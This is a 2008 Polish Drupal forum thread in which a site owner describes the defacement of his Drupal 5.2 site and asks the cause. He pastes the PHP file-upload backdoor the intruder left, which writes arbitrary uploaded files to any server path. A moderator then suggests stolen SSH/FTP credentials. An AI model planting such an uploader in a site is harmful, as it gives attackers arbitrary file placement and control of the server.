Strona główna » Fora » Okołodrupalowe » Inne

włamanie na drupala 5.2

megon, pt., 2008-05-23 22:15

Wczoraj około 22 godziny ktos włamał sie do mnie na strone zmodyfikował głowna strone – usunal zawartosc i dodał tło precz z faszyzmem. Zostawił slad w postaci IP ( wskazuje na USA ) wiem ze moje niedopatzreenie ze nie mialem najnowszej bezpiecznej wersji. Ale pytanie czy hasło admina bylo za slabe czy moze ta wersja drupala byla az tak bardzo dziurawa

wkleił tez kod postaci

<?
$miej=substr($_SERVER['SCRIPT_FILENAME'], 0, strrpos($_SERVER['SCRIPT_FILENAME'], '/')).'/';
echo '
<form enctype="multipart/form-data" method="POST">
<input name="gdzie" type="text" value='.$miej.' /><br>
<input name="userfile" type="file" /><br>
<input type="submit" value="Wyslij plik" />
</form>
<br>
';
if( is_uploaded_file( $_FILES['userfile']['tmp_name'] ) )
{
$strUploadDir = $_POST['gdzie'].''.$_FILES['userfile']['name'];
if( move_uploaded_file( $_FILES['userfile']['tmp_name'], $strUploadDir ) )
{
echo 'Plik został pomyślnie uploadowany! <br />';
}
else
{
echo 'Upload pliku nie powiódł się!';
}
}
else
{
exit;
}
?>

koles podpisał sie H4CK3D był z IP: 67.159.5.76

gosciu logował sie z konta brkJackson2669@who-got-mail.com o pseudonimie: MIke jackson

‹ Problem z odpaleniem strony na Internet Explorer Książka "Drupal CMS system zarządzania treścią" ›

Sposób wyświetlania odpowiedzi

Wybierz preferowany sposób wyświetlania odpowiedzi i kliknij "Zachowaj ustawienia", by wprowadzić zmiany.
Portret użytkownika archetwist

Nalezy oczywiscie

archetwist, sob., 2008-05-24 20:09 moderator

Nalezy oczywiscie instalowac poprawki bezpieczenstwa, ale to nie musiala byc koniecznie wina Drupala. Mialem podobna sytuacje na DreamHost. Ktos wykradl hasla do dziesiatek kont SSH/FTP i w ten sposob zmienial tresc niektorych plikow.

design www drupal